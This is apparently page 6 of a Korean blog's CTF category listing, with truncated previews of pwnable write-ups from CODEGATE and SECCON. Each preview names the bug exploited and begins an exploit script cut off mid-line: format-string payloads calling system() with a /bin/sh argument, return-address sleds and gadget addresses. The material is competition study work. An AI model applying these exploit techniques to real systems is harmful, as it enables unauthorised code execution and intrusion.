'CTF' 카테고리의 글 목록 (6 Page)

CODEGATE 2017 FINAL - petshop

2017.06.04· CTF/2017

Category : Pwnables Summary : c++, value assign miss Exploit#!/usr/bin/python from pwn import *from struct import pack, unpack def c_set(s, name, sound, feed):s.sendline('4')# set # overflow for leak s.recvuntil('select for set:')s.sendline('1') # animal1 s.recvuntil('name:')s.sendline(name) s.recvuntil('sound:')s.sendline(sound) s.recvuntil('feed:')s.sendline(feed) def c_setname(s, person): s.s..

CODEGATE 2017 FINAL - Building Owner

2017.06.04· CTF/2017

Category : Pwnables Summary : type confusion, c++, free heap Exploit#!/usr/bin/python from pwn import *from struct import pack, unpackp = lambda x : pack("

SECCON CTF QUAL 2016 - jmper

2017.01.02· CTF/2016

Category : Pwnables Summary : off by one to rop, setjmp Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res #def ror64(value, count): def ROR(data, shift, size=64): shift %= size body = data >> shift remains = (data

SECCON CTF QUAL 2016 - checker

2017.01.02· CTF/2016

Category : Pwnables Summary : memory leak with SSP protection Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res p = lambda x : pack("

CODEGATE FINAL 2015 - exploitshop

2016.07.20· CTF/2015

CODEGATE CTF 2014 - drupbox

2014.04.20· CTF/2014

Category : Pwnables Summary : make failure chdir(), get admin password, 13byte fsb Exploit#!/usr/bin/pythonfrom socket import *from struct import pack,unpack p = lambda x:pack("value")num = ((stack&0x0000ffff) - 4)-926payload = ""payload += p(system_addr)payload += "aaaa"payload += p(system_arg) s.send("4\n")s.recv(1024) s.send("1\n")s.recv(1024)s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/s..

CODEGATE CTF 2014 QUAL - weird_snus

2014.04.20· CTF/2014

Category : Pwnables Summary : overwrite function pointer in heap by heap overflow or use-after-free, lift esp + ret sleding loader.c#include #define RET "\x37\x93\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x40\x2e\x0f\x40"//#define EXECL "\x50\x24\x0f\x40"#define BINARY "\x74\x81\x04..

CODEGATE CTF 2014 QUAL - 4stone

2014.04.20· CTF/2014

Category : Pwnables Summary : clear game, overwrite any 4byte memory except 0x0804XXXX, _exit calls %gs + 0x14, lift esp + ret sleding loader.c#include #define RET "\x20\x99\x04\x08" // 0x08049920 retn#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET #define JMPESP "\x7d\x2a\x08\x40" // 0x40082a7d: jmp *%esp#defi..

티스토리툴바